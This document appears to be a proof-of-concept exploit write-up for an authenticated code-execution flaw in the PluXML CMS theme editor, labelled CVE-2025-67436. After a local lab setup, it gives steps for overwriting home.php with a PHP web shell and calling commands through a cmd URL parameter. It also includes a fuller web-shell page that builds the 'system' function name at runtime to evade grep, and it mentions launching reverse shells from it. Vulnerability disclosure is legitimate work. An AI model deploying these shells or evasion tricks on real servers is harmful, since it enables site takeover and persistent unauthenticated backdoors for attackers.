git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
Step-by-Step Exploitation
Authentication:
- Log in to the PluXML administration panel with valid administrator credentials (the issue is post-authentication; it turns an admin's theme-editing right into code execution on the server)
Navigate to Theme Editor:
- Access the administration dashboard
- Navigate to: Themes → Home.php → Edit

Inject Malicious Payload:
- Replace the existing content of home.php with a PHP web shell
- Example payload:
<?php system($_GET['cmd']); ?>
- Save the modified file
Trigger Execution:
- Visit the main home page of the website; PluXML renders the theme's home.php, so the injected PHP executes with the web server's privileges
- Remote commands can be executed via: http://target.com/?cmd=whoami
- Once home.php carries the shell, the cmd parameter is reachable by anyone without logging in: the authenticated file write has become an unauthenticated backdoor until the theme file is restored from a known-good copy
Web Shell
Payload of the web shell; it wraps the same system() primitive in an HTML form, and a reverse shell can be launched from it by submitting the appropriate one-liner as the command
<html>
<body>
  <!-- GET form posting back to the current page: a form with no action submits
       to the URL it was served from, so the name attribute is cosmetic -->
  <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
  </form>
  <pre>
<?php
if (isset($_GET['cmd'])) {
    // The function name is assembled at runtime so a grep for "system(" misses it;
    // PHP still resolves $func_name(...) as a variable function call to system().
    $func_name = "sys" . "tem";
    // system() echoes the command's output, which lands inside the <pre> block.
    $func_name($_GET['cmd']);
}
?>
  </pre>
</body>
</html>
References
- CVE-2025-67436 (NVD): https://nvd.nist.gov/vuln/detail/CVE-2025-67436
- PluXML official website: https://www.pluxml.org/
- PluXML GitHub repository: https://github.com/pluxml/PluXml
- OWASP Top 10, A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/